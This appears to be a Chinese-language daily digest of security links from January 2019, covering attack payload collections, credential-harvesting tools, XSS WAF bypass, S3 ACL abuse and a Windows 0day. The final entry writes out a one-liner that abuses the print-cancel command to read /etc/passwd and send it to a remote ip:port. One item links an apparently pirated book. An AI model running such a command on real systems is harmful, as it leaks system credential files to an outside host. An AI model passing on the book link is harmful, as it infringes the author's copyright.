2019.01.01

[工具] Web攻击有效负载的集合: https://github.com/foospidy/payloads

[工具] ss7MAPer渗透工具包: https://github.com/ernw/ss7MAPer

[工具] vti-dorks用于VirusTotal Intelligence搜索查询: https://github.com/Neo23x0/vti-dorks

[文章] 像1989那样fuzz: https://blog.trailofbits.com/2018/12/31/fuzzing-like-its-1989/

[文章] 保护域免受mimikatz攻击: http://woshub.com/defending-windows-domain-against-mimikatz-attacks/

[文章] 使用knoxs绕过waf进行xss检测: https://medium.com/@Alra3ees/knoxss-the-wafs-slayer-eaa9763cda78

[文章] 利用已知的信息安全社区智慧排查恶意威胁: https://medium.com/@maarten.goet/windows-defender-atp-harnessing-the-collective-intelligence-of-the-infosec-community-for-threat-1758ec987db8

[文章] 滥用s3的acl权限覆盖其他用户上传的文件: https://medium.com/@armaanpathan/abusing-acl-permissions-to-overwrite-other-users-uploaded-files-videos-on-s3-bucket-162c8877728

[文章] 缓冲区溢出实例: https://0xrick.github.io/binary-exploitation/bof2/

[工具] gimmecredz快速获取Linux所有凭据: https://github.com/0xmitsurugi/gimmecredz

[0day] 用任意数据覆盖文件的Windows 0day: https://www.bleepingcomputer.com/news/security/windows-zero-day-bug-allows-overwriting-files-with-arbitrary-data/

[misc] 信息技术人员的10个理财课 : https://www.troyhunt.com/10-personal-finance-lessons-for-technology-professionals/

[书籍] 价值40刀的 《Rootkits and Bootkits》 : https://mega.nz/#!KaRmEQAY!dxSwDoUmI3ssRFVHdz2DjBC-NBklAffbkWdJ9icU4bU

[文章] DNSAdmin到DC的协议特性 : https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83

[奇淫技巧] : cancel是取消打印作业的命令,远程执行命令

cancel -u "$(cat /etc/passwd)" -h ip:port

Last Updated: 12/31/2018, 10:25:59 PM